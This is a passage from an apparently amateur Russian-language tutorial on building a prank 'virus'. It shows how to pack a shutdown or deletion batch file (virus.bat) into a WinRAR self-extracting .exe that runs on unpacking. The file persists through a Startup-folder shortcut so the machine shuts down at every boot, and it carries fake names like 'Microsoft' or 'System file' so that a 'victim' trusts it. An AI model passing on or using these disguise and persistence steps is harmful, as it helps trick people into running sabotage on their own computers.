Если вы напишите всё по русски то получится абракадабра. Если вы поставите Р. кодовую. всё равно получиться абракадабра (она предназначена лишь для того если в какой то команде есть русские буквы). Не знаю как вы будете писать может "Ystanovka igri", у меня есть декодировщик...
--------------------------------------------------------------------------------
На картинке показано что идёт уже второй этап нашего вируса. А "Жертва" видит только сообщения о установи.
Ну и конечно не следует оставлять всё простым командным файлом, надо всё красиво запаковать WinRAR
Красивая оболочка
Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)
Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!
Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» ничего писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).
--------------------------------------------------------------------------------
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!
--------------------------------------------------------------------------------
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.